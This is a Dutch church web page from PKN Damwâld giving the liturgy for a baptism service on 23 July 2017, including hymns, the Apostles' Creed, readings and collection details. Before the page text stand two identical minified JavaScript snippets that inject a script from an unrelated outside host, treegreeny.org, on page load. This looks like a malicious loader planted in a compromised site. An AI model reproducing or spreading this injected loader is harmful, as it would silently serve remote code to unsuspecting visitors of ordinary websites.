;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Kerkdienst zondag 23 juli 2017 9:30 uur - PKN Damwâld
zondag 23 juli 2017
09:30 uur

Kerkdienst zondag 23 juli 2017 9:30 uur

Thema: Doopdienst : Jimte Foeke Bruinsma

Informatie

Voorganger:Ds. W.L. de Jong, Rinsumageast
Organist:Jaap v/d Horn
Thema:Doopdienst : Jimte Foeke Bruinsma
Liturgie
Lied voor de dienst Elb 426
Welkom en mededeilngen
Intochtslied Psalm 103: 1, 3 en 5
Stil gebed, votum en groet .
Gebed .
Loflied gezang 334: 1 en 3.
Dooponderricht
We zingen: Elb 170
Doopgebed .
Doopvragen
Apostolische Geloofsbelijdenis (staande uitgesproken door hele gemeente)
Ik geloof in God de Vader, de Almachtige,
Schepper des hemels en der aarde.
En in Jezus Christus,
zijn eniggeboren Zoon, onze Heer,
die ontvangen is van de heilige Geest,
geboren uit de maagd Maria,
die geleden heeft onder Pontius Pilatus,
is gekruisigd, gestorven en begraven,
nedergedaald ter helle,
ten derden dage wederom opgestaan van de doden,
opgevaren ten hemel,
zittende ter rechterhand Gods,
des almachtigen Vaders,
vanwaar Hij komen zal om te oordelen
de levenden en de doden.
Ik geloof in de heilige Geest,
ik geloof één heilige, algemene, christelijke kerk,
de gemeenschap der heiligen,
vergeving der zonden,
wederopstanding des vleses
en een eeuwig leven.
Amen, amen, amen.
Dooplied gezang 335: 1, 2, 3, 4 en 5
Bediening van de doop
Toezingen dopeling en zijn ouders met 2 liederen: gezang 335:6
We zingen: “Kom aan boord”
Gebed om de Heilige Geest bij de opening v.h. Woord .
We lezen: Handelingen 2: 22 t/m 24, 32 t/m 40
We zingen: Opw 599
Verkondiging
We zingen: gez 477
Dankgebed en voorbeden, besloten met het “Onze Vader”
Collecte
Slotlied Elb 270
Zegen
Liturgie met de liedteksten is alleen beschikbaar met een Mijn Kerk account. Inloggen
Locatie: De Ikker Hearewei 1, Damwâld
Dienst terugluisteren Dienst terugluisteren
Collecte informatie
Eerste collecte: Kerkelijk recreatiewerk Lauwersmeergebied

Op 18 mei 1976 werd vanuit de Kerkgemeenschappen rond Lauwersoog de Vereniging tot Kerkelijk Recreatiewerk in het Lauwersmeergebied opgericht, kortweg VKRW Lauwersoog. Bij veel mensen beter bekend als de "Witte Tent op Lauwersoog. Want in deze "Witte Tent" spelen zich gedurende 7 weken in de zomerperiode de activiteiten van de vereniging af. Op dit moment bestaan de activiteiten van de vereniging uit het organiseren van diensten op de zondagmorgen en sing-ins op de zondagavond.

Tweede collecte: Kerk
Uitganscollecte: Kerk